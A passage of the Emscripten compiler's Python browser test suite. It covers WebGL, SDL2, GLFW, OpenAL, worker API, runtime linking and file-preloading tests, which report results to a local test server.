@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main(int argc, const char *argv[]) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=[supp.wasm]', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
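# run both without and with a memory init file; the preRun dependency should delay run() in both modes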
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
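# each testcase runs in both wasm and asm.js (WASM=0) modes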
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=[_one,_two,_three,_four]', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=[_one]', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
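# a .so suffix lets the shared-library preload plugin recognize the file and
# populate Module['preloadedWasm'] (checked by main.c below)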
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high-quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run the tests in Node and/or SPIDERMONKEY using self.run_js. Use the closure compiler so we can check
# that require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists
# but context creation fails, we can then manually try to create a WebGL1
# context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# in the non-wasm case, also verify that the mem init request succeeded
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
        // send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
